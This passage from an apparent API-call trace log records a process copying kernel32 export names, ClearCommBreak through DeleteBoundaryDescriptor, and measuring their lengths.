lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.363] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.363] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.363] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.363] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.363] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.363] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.363] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.363] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.363] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.363] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.364] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.364] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.364] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.364] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.364] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.364] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.364] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.364] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.364] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.364] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.364] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.364] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.364] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.364] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.364] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.364] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.364] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.364] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.365] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.365] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.365] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.365] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.365] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.365] lstrlenA (lpString="COPYFILEA") returned 9 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.365] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.365] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.365] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.365] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.365] lstrlenA (lpString="COPYFILEW") returned 9 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.365] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.365] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.365] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.365] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.365] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.365] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.365] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.366] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.366] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.366] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.366] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.366] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.366] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.366] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.366] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.366] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.366] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.366] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.366] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.366] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.366] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.366] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.366] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.366] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.366] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.366] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.367] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.367] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.367] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.367] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.367] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.367] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.367] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.367] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.367] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.367] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.367] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.367] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.367] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.367] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.367] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.367] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.367] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.367] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.367] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.367] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.368] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.368] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.368] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.368] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.368] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.368] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.368] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.368] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.368] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.368] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.368] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.368] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.368] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.368] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.368] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.368] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.368] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.368] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.369] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.369] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.369] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.369] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.369] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.369] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.369] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.369] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.369] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.369] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.369] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.369] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.369] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.369] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.369] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.369] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.369] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.369] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.369] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.370] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.370] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.370] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.370] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.370] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.370] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.370] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.370] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.370] lstrlenA (lpString="DELETEATOM") returned 10 [0078.370] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") 